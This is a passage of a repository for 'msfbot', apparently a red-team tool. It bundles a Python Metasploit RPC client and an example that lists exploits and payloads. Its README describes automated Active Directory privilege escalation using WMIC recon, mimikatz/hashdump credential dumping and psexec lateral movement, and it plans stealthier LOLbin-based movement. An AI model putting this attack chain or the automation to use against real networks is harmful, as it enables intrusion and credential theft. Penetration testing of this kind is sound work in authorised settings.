├── msfrpc.rc
├── msfrpc
├── PKG-INFO
├── setup.py
├── examples
│ └── test.py
├── msfrpc.py
├── README
└── LICENSE.txt
├── Pipfile
├── LICENSE
├── README.md
├── .gitignore
├── Pipfile.lock
├── msfbot.py
└── scripts
└── obf-pview.ps1
/msfrpc.rc:
--------------------------------------------------------------------------------
1 | load msgrpc Pass=123
2 |
--------------------------------------------------------------------------------
/msfrpc/PKG-INFO:
--------------------------------------------------------------------------------
1 | Metadata-Version: 1.0
2 | Name: msfrpc
3 | Version: 0.1
4 | Summary: Python MSF-RPC Bindings
5 | Home-page: http://www.trustwave.com
6 | Author: Ryan Linn
7 | Author-email: RLinn@trustwave.com
8 | License: GPLv3
9 | Description: UNKNOWN
10 | Platform: UNKNOWN
11 |
--------------------------------------------------------------------------------
/Pipfile:
--------------------------------------------------------------------------------
1 | [[source]]
2 | url = "https://pypi.python.org/simple"
3 | verify_ssl = true
4 | name = "pypi"
5 |
6 | [dev-packages]
7 |
8 | [packages]
9 | ipython = "*"
10 | netaddr = "*"
11 | termcolor = "*"
12 | netifaces = "*"
13 | requests = "*"
14 | msgpack = "*"
15 | asyncio = "*"
16 | python-libnmap = "*"
17 |
18 | [requires]
19 | python_version = "3.6"
20 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Dan McInerney
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/msfrpc/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
3 | # Ryan Linn - RLinn@trustwave.com
4 | # Copyright (C) 2011 Trustwave
5 | # This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
6 |
7 | # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
8 |
9 | # You should have received a copy of the GNU General Public License along with this program. If not, see .
10 |
11 | from distutils.core import setup
12 |
13 | setup(name='msfrpc',
14 | version='0.1',
15 | description='Python MSF-RPC Bindings',
16 | author='Ryan Linn',
17 | author_email='RLinn@trustwave.com',
18 | url='http://www.trustwave.com',
19 | license='GPLv3',
20 | py_modules=['msfrpc'],
21 | )
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | msfbot
2 | ------
3 | PROJECT IN PROGRESS. Waits for a Metasploit shell on an Active Directory environment then automatically privilege escalates to domain admin.
4 |
5 | #### Installation
6 | This install is only tested on Kali. Clone into the repo, enter the cloned folder and run install.sh. Open a new terminal and start metasploit with the included rc file. Back in the original terminal continue by entering the newly-created virtual environment with pipenv. Finally, enter the included msfrpc/ folder and install it now that you're inside the virtual environment.
7 |
8 | ```
9 | git clone https://github.com/DanMcInerney/msfbot
10 | cd msfbot
11 | In a new terminal: msfconsole -r msfrpc.rc
12 | pipenv install --three
13 | pipenv shell
14 | cd msfrpc && python2 setup install && cd ..
15 | ```
16 |
17 | #### Usage
18 | ```./msfbot.py ```
19 |
20 | #### Current progress
21 | Listens for session, performs AV-resistant domain recon (with wmic), lateral spread, does mimikatz/hashdump, does lateral movement with psexec_psh.
22 |
23 | #### To do
24 | * Needs a lot more testing, only have a couple windows labs to test this in
25 | * Need to change lateral movement to something more red teamy than psexec_psh, maybe use the LOLbin extexport.exe to remotely load a shelltered payload on remote box using wmic?
26 | * Add --stealth flag. Have it work for speed normally unless this switch is given and then use red team tactics instead.
27 |
--------------------------------------------------------------------------------
/msfrpc/examples/test.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
3 | # Ryan Linn - RLinn@trustwave.com
4 | # Copyright (C) 2011 Trustwave
5 | # This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
6 |
7 | # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
8 |
9 | # You should have received a copy of the GNU General Public License along with this program. If not, see .
10 |
11 | import msfrpc
12 |
13 | if __name__ == '__main__':
14 |
15 | # Create a new instance of the Msfrpc client with the default options
16 | client = msfrpc.Msfrpc({})
17 |
18 | # Login to the msfmsg server using the password "abc123"
19 | client.login('msf','abc123')
20 |
21 | # Get a list of the exploits from the server
22 | mod = client.call('module.exploits')
23 |
24 | # Grab the first item from the modules value of the returned dict
25 | print "Compatible payloads for : %s\n" % mod['modules'][0]
26 |
27 | # Get the list of compatible payloads for the first option
28 | ret = client.call('module.compatible_payloads',[mod['modules'][0]])
29 | for i in (ret.get('payloads')):
30 | print "\t%s" % i
31 |
32 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib/
18 | lib64/
19 | parts/
20 | sdist/
21 | var/
22 | wheels/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 | MANIFEST
27 |
28 | # PyInstaller
29 | # Usually these files are written by a python script from a template
30 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
31 | *.manifest
32 | *.spec
33 |
34 | # Installer logs
35 | pip-log.txt
36 | pip-delete-this-directory.txt
37 |
38 | # Unit test / coverage reports
39 | htmlcov/
40 | .tox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | .hypothesis/
48 | .pytest_cache/
49 |
50 | # Translations
51 | *.mo
52 | *.pot
53 |
54 | # Django stuff:
55 | *.log
56 | local_settings.py
57 | db.sqlite3
58 |
59 | # Flask stuff:
60 | instance/
61 | .webassets-cache
62 |
63 | # Scrapy stuff:
64 | .scrapy
65 |
66 | # Sphinx documentation
67 | docs/_build/
68 |
69 | # PyBuilder
70 | target/
71 |
72 | # Jupyter Notebook
73 | .ipynb_checkpoints
74 |
75 | # pyenv
76 | .python-version
77 |
78 | # celery beat schedule file
79 | celerybeat-schedule
80 |
81 | # SageMath parsed files
82 | *.sage.py
83 |
84 | # Environments
85 | .env
86 | .venv
87 | env/
88 | venv/
89 | ENV/
90 | env.bak/
91 | venv.bak/
92 |
93 | # Spyder project settings
94 | .spyderproject
95 | .spyproject
96 |
97 | # Rope project settings
98 | .ropeproject
99 |
100 | # mkdocs documentation
101 | /site
102 |
103 | # mypy
104 | .mypy_cache/
105 |
--------------------------------------------------------------------------------
/msfrpc/msfrpc.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python3
2 |
3 | # MSF-RPC - A Python library to facilitate MSG-RPC communication with Metasploit
4 |
5 | # Copyright (c) 2014-2016 Ryan Linn - RLinn@trustwave.com, Marcello Salvati - byt3bl33d3r@gmail.com
6 | #
7 | # This program is free software; you can redistribute it and/or
8 | # modify it under the terms of the GNU General Public License as
9 | # published by the Free Software Foundation; either version 3 of the
10 | # License, or (at your option) any later version.
11 | #
12 | # This program is distributed in the hope that it will be useful, but
13 | # WITHOUT ANY WARRANTY; without even the implied warranty of
14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | # General Public License for more details.
16 | #
17 | # You should have received a copy of the GNU General Public License
18 | # along with this program; if not, write to the Free Software
19 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
20 | # USA
21 | #
22 |
23 | import msgpack
24 | import requests
25 |
26 |
27 | class MsfError(Exception):
28 | def __init__(self, msg):
29 | self.msg = msg
30 |
31 | def __str__(self):
32 | return repr(self.msg)
33 |
34 |
35 | class MsfAuthError(MsfError):
36 | def __init__(self, msg):
37 | self.msg = msg
38 |
39 |
40 | class Msfrpc:
41 |
42 | def __init__(self, opts=[]):
43 | self.host = opts.get('host') or "127.0.0.1"
44 | self.port = opts.get('port') or "55552"
45 | self.uri = opts.get('uri') or "/api/"
46 | self.ssl = opts.get('ssl') or False
47 | self.token = None
48 | self.headers = {"Content-type": "binary/message-pack"}
49 |
50 | def encode(self, data):
51 | return msgpack.packb(data)
52 |
53 | def decode(self, data):
54 | return msgpack.unpackb(data)
55 |
56 | def call(self, method, opts=[]):
57 | if method != 'auth.login':
58 | if self.token is None:
59 | raise MsfAuthError("MsfRPC: Not Authenticated")
60 |
61 | if method != "auth.login":
62 | opts.insert(0, self.token)
63 |
64 | if self.ssl is True:
65 | url = "https://%s:%s%s" % (self.host, self.port, self.uri)
66 | else:
67 | url = "http://%s:%s%s" % (self.host, self.port, self.uri)
68 |
69 | opts.insert(0, method)
70 | payload = self.encode(opts)
71 |
72 | r = requests.post(url, data=payload, headers=self.headers)
73 |
74 | opts[:] = [] # Clear opts list
75 |
76 | return self.decode(r.content)
77 |
78 | def login(self, user, password):
79 | auth = self.call("auth.login", [user, password])
80 | try:
81 | if auth[b'result'] == b'success':
82 | self.token = auth[b'token']
83 | return True
84 | except:
85 | raise MsfAuthError("MsfRPC: Authentication failed")
86 |
--------------------------------------------------------------------------------
/msfrpc/README:
--------------------------------------------------------------------------------
1 | =====================
2 | MSF-RPC Python Module
3 | Release Date: December 23, 2011
4 | Ryan Linn
5 | http://www.trustwave.com
6 | =====================
7 | -----------------------------------------------------
8 | A module for dealing with msgpack RPC with Metasploit
9 | -----------------------------------------------------
10 |
11 |
12 | Introduction
13 | ============
14 | This module is designed to allow interaction with Metasploit msgrpc plugin to
15 | allow remote requests and commands to be executed through scripts and programs.
16 | In order to start the Metasploit msgrpc plugin to test this module, issue the
17 | commands in msfconsole:
18 |
19 | load msgrpc Pass=abc123
20 |
21 | Once the load message appears, you should be able to run these scripts.
22 |
23 | Using The Module
24 | ================
25 | Creating a Msfrpc client instance
26 | --------------------------------
27 | To create a new instance of the client, you must import the msfrpc module, and
28 | then create a new Msfrpc instance. You can specify any number of options in a
29 | dict form to the constructor which will allow any of the options such as host,
30 | port or ssl to be modifled or enabled. An example of creating a new client is :
31 |
32 | import msfrpc
33 |
34 |
35 | # Create a new instance of the Msfrpc client with the default options
36 | client = msfrpc.Msfrpc({})
37 |
38 | Logging into Metasploit
39 | -----------------------
40 | Before any commands can be issued, you must authenticate into metasploit to do
41 | this, use the login method of the new client and specify the username and
42 | password to use. The default user is always msf, and the password was specified
43 | either through the Pass option when we loaded the msgrpc module, or assigned by
44 | default and presented to the screen. To use the method we call the method with
45 | the two arguments:
46 |
47 | # Login to the msfmsg server using the password "abc123"
48 | client.login('msf','abc123')
49 |
50 | Executing API Calls
51 | -------------------
52 | The call method allows us to call API elements from within Metasploit that are
53 | surfaced through the msgrpc interface. For the first example, we will request
54 | the list of all exploits form the server. To do this, we call the
55 | module.exploits function.
56 |
57 | # Get a list of the exploits from the server
58 | mod = client.call('module.exploits')
59 |
60 | The information returned from the call is a dict containing the list of modules
61 | under the key modules. If we wanted to take the first of those modules, and then
62 | find all of the payloads that were compatible, we could call the
63 | module.compatible_payloads method to find the payloads compatible with our
64 | exploit. In this case, if more than one option is required a list of options are
65 | passed. The compatible_payloads method requires one argument: the exploit to get
66 | more information about.
67 |
68 | # Get the list of compatible payloads for the first option
69 | ret = client.call('module.compatible_payloads',[mod['modules'][0]])
70 |
71 | The ret in this case contains a dict of payloads, which can be enumerated. The
72 | full example can be found under the examples directory.
73 |
74 | Copyright
75 | =========
76 | MSFRPC - A module for dealing with msgpack RPC with Metasploit
77 | Ryan Linn
78 | Copyright (C) 2012 Trustwave Holdings, Inc.
79 |
80 | This program is free software: you can redistribute it and/or modify
81 | it under the terms of the GNU General Public License as published by
82 | the Free Software Foundation, either version 3 of the License, or
83 | (at your option) any later version.
84 |
85 | This program is distributed in the hope that it will be useful,
86 | but WITHOUT ANY WARRANTY; without even the implied warranty of
87 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
88 | GNU General Public License for more details.
89 |
90 | You should have received a copy of the GNU General Public License
91 | along with this program. If not, see
92 |
--------------------------------------------------------------------------------
/Pipfile.lock:
--------------------------------------------------------------------------------
1 | {
2 | "_meta": {
3 | "hash": {
4 | "sha256": "64de3fb85f0fdc84b7756296d9095c04e76fe8adfe1a128e1bf3345cd3285b6a"
5 | },
6 | "pipfile-spec": 6,
7 | "requires": {
8 | "python_version": "3.6"
9 | },
10 | "sources": [
11 | {
12 | "name": "pypi",
13 | "url": "https://pypi.python.org/simple",
14 | "verify_ssl": true
15 | }
16 | ]
17 | },
18 | "default": {
19 | "asyncio": {
20 | "hashes": [
21 | "sha256:83360ff8bc97980e4ff25c964c7bd3923d333d177aa4f7fb736b019f26c7cb41",
22 | "sha256:b62c9157d36187eca799c378e572c969f0da87cd5fc42ca372d92cdb06e7e1de",
23 | "sha256:c46a87b48213d7464f22d9a497b9eef8c1928b68320a2fa94240f969f6fec08c",
24 | "sha256:c4d18b22701821de07bd6aea8b53d21449ec0ec5680645e5317062ea21817d2d"
25 | ],
26 | "index": "pypi",
27 | "version": "==3.4.3"
28 | },
29 | "backcall": {
30 | "hashes": [
31 | "sha256:38ecd85be2c1e78f77fd91700c76e14667dc21e2713b63876c0eb901196e01e4",
32 | "sha256:bbbf4b1e5cd2bdb08f915895b51081c041bac22394fdfcfdfbe9f14b77c08bf2"
33 | ],
34 | "version": "==0.1.0"
35 | },
36 | "certifi": {
37 | "hashes": [
38 | "sha256:13e698f54293db9f89122b0581843a782ad0934a4fe0172d2a980ba77fc61bb7",
39 | "sha256:9fa520c1bacfb634fa7af20a76bcbd3d5fb390481724c597da32c719a7dca4b0"
40 | ],
41 | "version": "==2018.4.16"
42 | },
43 | "chardet": {
44 | "hashes": [
45 | "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae",
46 | "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"
47 | ],
48 | "version": "==3.0.4"
49 | },
50 | "decorator": {
51 | "hashes": [
52 | "sha256:2c51dff8ef3c447388fe5e4453d24a2bf128d3a4c32af3fabef1f01c6851ab82",
53 | "sha256:c39efa13fbdeb4506c476c9b3babf6a718da943dab7811c206005a4a956c080c"
54 | ],
55 | "version": "==4.3.0"
56 | },
57 | "idna": {
58 | "hashes": [
59 | "sha256:2c6a5de3089009e3da7c5dde64a141dbc8551d5b7f6cf4ed7c2568d0cc520a8f",
60 | "sha256:8c7309c718f94b3a625cb648ace320157ad16ff131ae0af362c9f21b80ef6ec4"
61 | ],
62 | "version": "==2.6"
63 | },
64 | "ipython": {
65 | "hashes": [
66 | "sha256:a0c96853549b246991046f32d19db7140f5b1a644cc31f0dc1edc86713b7676f",
67 | "sha256:eca537aa61592aca2fef4adea12af8e42f5c335004dfa80c78caf80e8b525e5c"
68 | ],
69 | "index": "pypi",
70 | "version": "==6.4.0"
71 | },
72 | "ipython-genutils": {
73 | "hashes": [
74 | "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8",
75 | "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"
76 | ],
77 | "version": "==0.2.0"
78 | },
79 | "jedi": {
80 | "hashes": [
81 | "sha256:1972f694c6bc66a2fac8718299e2ab73011d653a6d8059790c3476d2353b99ad",
82 | "sha256:5861f6dc0c16e024cbb0044999f9cf8013b292c05f287df06d3d991a87a4eb89"
83 | ],
84 | "version": "==0.12.0"
85 | },
86 | "msgpack": {
87 | "hashes": [
88 | "sha256:0b3b1773d2693c70598585a34ca2715873ba899565f0a7c9a1545baef7e7fbdc",
89 | "sha256:0bae5d1538c5c6a75642f75a1781f3ac2275d744a92af1a453c150da3446138b",
90 | "sha256:0ee8c8c85aa651be3aa0cd005b5931769eaa658c948ce79428766f1bd46ae2c3",
91 | "sha256:1369f9edba9500c7a6489b70fdfac773e925342f4531f1e3d4c20ac3173b1ae0",
92 | "sha256:22d9c929d1d539f37da3d1b0e16270fa9d46107beab8c0d4d2bddffffe895cee",
93 | "sha256:2ff43e3247a1e11d544017bb26f580a68306cec7a6257d8818893c1fda665f42",
94 | "sha256:31a98047355d34d047fcdb55b09cb19f633cf214c705a765bd745456c142130c",
95 | "sha256:8767eb0032732c3a0da92cbec5ac186ef89a3258c6edca09161472ca0206c45f",
96 | "sha256:8acc8910218555044e23826980b950e96685dc48124a290c86f6f41a296ea172",
97 | "sha256:ab189a6365be1860a5ecf8159c248f12d33f79ea799ae9695fa6a29896dcf1d4",
98 | "sha256:cfd6535feb0f1cf1c7cdb25773e965cc9f92928244a8c3ef6f8f8a8e1f7ae5c4",
99 | "sha256:e274cd4480d8c76ec467a85a9c6635bbf2258f0649040560382ab58cabb44bcf",
100 | "sha256:f86642d60dca13e93260187d56c2bef2487aa4d574a669e8ceefcf9f4c26fd00",
101 | "sha256:f8a57cbda46a94ed0db55b73e6ab0c15e78b4ede8690fa491a0e55128d552bb0",
102 | "sha256:fcea97a352416afcbccd7af9625159d80704a25c519c251c734527329bb20d0e"
103 | ],
104 | "index": "pypi",
105 | "version": "==0.5.6"
106 | },
107 | "netaddr": {
108 | "hashes": [
109 | "sha256:38aeec7cdd035081d3a4c306394b19d677623bf76fa0913f6695127c7753aefd",
110 | "sha256:56b3558bd71f3f6999e4c52e349f38660e54a7a8a9943335f73dfc96883e08ca"
111 | ],
112 | "index": "pypi",
113 | "version": "==0.7.19"
114 | },
115 | "netifaces": {
116 | "hashes": [
117 | "sha256:0083ff8d89c559d0da0811c4930cf36e4945da0f03749e0f108678098d7d1607",
118 | "sha256:179f2463469fe69c829c96c7b332c7fd3f01652311e36ae11e409e5b34eb9dad",
119 | "sha256:19df6feff2af7a9179e42afdd01d79616d85b7ff4401b55ffce2df29d512a017",
120 | "sha256:1a4082a52f521ceeaf3d0ff25c61a06d46444f3578f487935652ecc93becf538",
121 | "sha256:1edeea7d739b1d716d15214039386e999f2e374aaeac0703092132b4e55ba461",
122 | "sha256:2acb23ca092cc53b2b1f374132bbef5dd843767f6b10d31024f958474a1dfe96",
123 | "sha256:38969c101f1e61c2a53af6a7b635f63e81085ae87413f1f5551a4d7057f5f773",
124 | "sha256:4817871b226082600b64578549b9932bb07c1a42e9311ddd7c9dad08ff1fb22f",
125 | "sha256:4bb6b02b7c485a595a9d75346df3a77fcaa12d2352437c49c2d73ed968572d72",
126 | "sha256:674498dad41dacd86ec82e9e1793f9d8716755085c3776f051a266b1634a0b60",
127 | "sha256:7ea8eb1e824f74c161396f0d6d76fa3943462ee9a4629c387c10399d2aee058c",
128 | "sha256:8a69dc2743dcbb9b87fa3453820852f0feabc17b03d3841619e8e63f5d3902d5",
129 | "sha256:9cf8cb2de7524c34808e6111dfb9f89e3b7c568e6953b3e02b8397447a6d8303",
130 | "sha256:a77263e046636a761a2c3eeb0a56b5f8fa64f865efec91a9be008a46412b4ddd",
131 | "sha256:aea569ce1a5a75b010758097199f84d9a3a109a696473c635bcf82f8a43cc551",
132 | "sha256:bd590fcb75421537d4149825e1e63cca225fd47dad861710c46bd1cb329d8cbd",
133 | "sha256:e1037cfad0e99a23fb4829f40302f3696395358950ba9f0315363a0e1eb04af6",
134 | "sha256:e6d52aee254f9cf6192b54c156c67d54dcf451bec6781580844af892e4bf36bb",
135 | "sha256:e76d38d9cff51ecf9fd5b8d0adf63f7b8875e1ac8548ccb52264939e308b771e"
136 | ],
137 | "index": "pypi",
138 | "version": "==0.10.7"
139 | },
140 | "parso": {
141 | "hashes": [
142 | "sha256:cdef26e8adc10d589f3ec4eb444bd0a29f3f1eb6d72a4292ab8afcb9d68976a6",
143 | "sha256:f0604a40b96e062b0fd99cf134cc2d5cdf66939d0902f8267d938b0d5b26707f"
144 | ],
145 | "version": "==0.2.1"
146 | },
147 | "pexpect": {
148 | "hashes": [
149 | "sha256:2a8e88259839571d1251d278476f3eec5db26deb73a70be5ed5dc5435e418aba",
150 | "sha256:3fbd41d4caf27fa4a377bfd16fef87271099463e6fa73e92a52f92dfee5d425b"
151 | ],
152 | "markers": "sys_platform != 'win32'",
153 | "version": "==4.6.0"
154 | },
155 | "pickleshare": {
156 | "hashes": [
157 | "sha256:84a9257227dfdd6fe1b4be1319096c20eb85ff1e82c7932f36efccfe1b09737b",
158 | "sha256:c9a2541f25aeabc070f12f452e1f2a8eae2abd51e1cd19e8430402bdf4c1d8b5"
159 | ],
160 | "version": "==0.7.4"
161 | },
162 | "prompt-toolkit": {
163 | "hashes": [
164 | "sha256:1df952620eccb399c53ebb359cc7d9a8d3a9538cb34c5a1344bdbeb29fbcc381",
165 | "sha256:3f473ae040ddaa52b52f97f6b4a493cfa9f5920c255a12dc56a7d34397a398a4",
166 | "sha256:858588f1983ca497f1cf4ffde01d978a3ea02b01c8a26a8bbc5cd2e66d816917"
167 | ],
168 | "version": "==1.0.15"
169 | },
170 | "ptyprocess": {
171 | "hashes": [
172 | "sha256:e64193f0047ad603b71f202332ab5527c5e52aa7c8b609704fc28c0dc20c4365",
173 | "sha256:e8c43b5eee76b2083a9badde89fd1bbce6c8942d1045146e100b7b5e014f4f1a"
174 | ],
175 | "version": "==0.5.2"
176 | },
177 | "pygments": {
178 | "hashes": [
179 | "sha256:78f3f434bcc5d6ee09020f92ba487f95ba50f1e3ef83ae96b9d5ffa1bab25c5d",
180 | "sha256:dbae1046def0efb574852fab9e90209b23f556367b5a320c0bcb871c77c3e8cc"
181 | ],
182 | "version": "==2.2.0"
183 | },
184 | "requests": {
185 | "hashes": [
186 | "sha256:6a1b267aa90cac58ac3a765d067950e7dbbf75b1da07e895d1f594193a40a38b",
187 | "sha256:9c443e7324ba5b85070c4a818ade28bfabedf16ea10206da1132edaa6dda237e"
188 | ],
189 | "index": "pypi",
190 | "version": "==2.18.4"
191 | },
192 | "simplegeneric": {
193 | "hashes": [
194 | "sha256:dc972e06094b9af5b855b3df4a646395e43d1c9d0d39ed345b7393560d0b9173"
195 | ],
196 | "version": "==0.8.1"
197 | },
198 | "six": {
199 | "hashes": [
200 | "sha256:70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9",
201 | "sha256:832dc0e10feb1aa2c68dcc57dbb658f1c7e65b9b61af69048abc87a2db00a0eb"
202 | ],
203 | "version": "==1.11.0"
204 | },
205 | "termcolor": {
206 | "hashes": [
207 | "sha256:1d6d69ce66211143803fbc56652b41d73b4a400a2891d7bf7a1cdf4c02de613b"
208 | ],
209 | "index": "pypi",
210 | "version": "==1.1.0"
211 | },
212 | "traitlets": {
213 | "hashes": [
214 | "sha256:9c4bd2d267b7153df9152698efb1050a5d84982d3384a37b2c1f7723ba3e7835",
215 | "sha256:c6cb5e6f57c5a9bdaa40fa71ce7b4af30298fbab9ece9815b5d995ab6217c7d9"
216 | ],
217 | "version": "==4.3.2"
218 | },
219 | "urllib3": {
220 | "hashes": [
221 | "sha256:06330f386d6e4b195fbfc736b297f58c5a892e4440e54d294d7004e3a9bbea1b",
222 | "sha256:cc44da8e1145637334317feebd728bd869a35285b93cbb4cca2577da7e62db4f"
223 | ],
224 | "version": "==1.22"
225 | },
226 | "wcwidth": {
227 | "hashes": [
228 | "sha256:3df37372226d6e63e1b1e1eda15c594bca98a22d33a23832a90998faa96bc65e",
229 | "sha256:f4ebe71925af7b40a864553f761ed559b43544f8f71746c2d756c7fe788ade7c"
230 | ],
231 | "version": "==0.1.7"
232 | }
233 | },
234 | "develop": {}
235 | }
236 |
--------------------------------------------------------------------------------
/msfrpc/LICENSE.txt:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
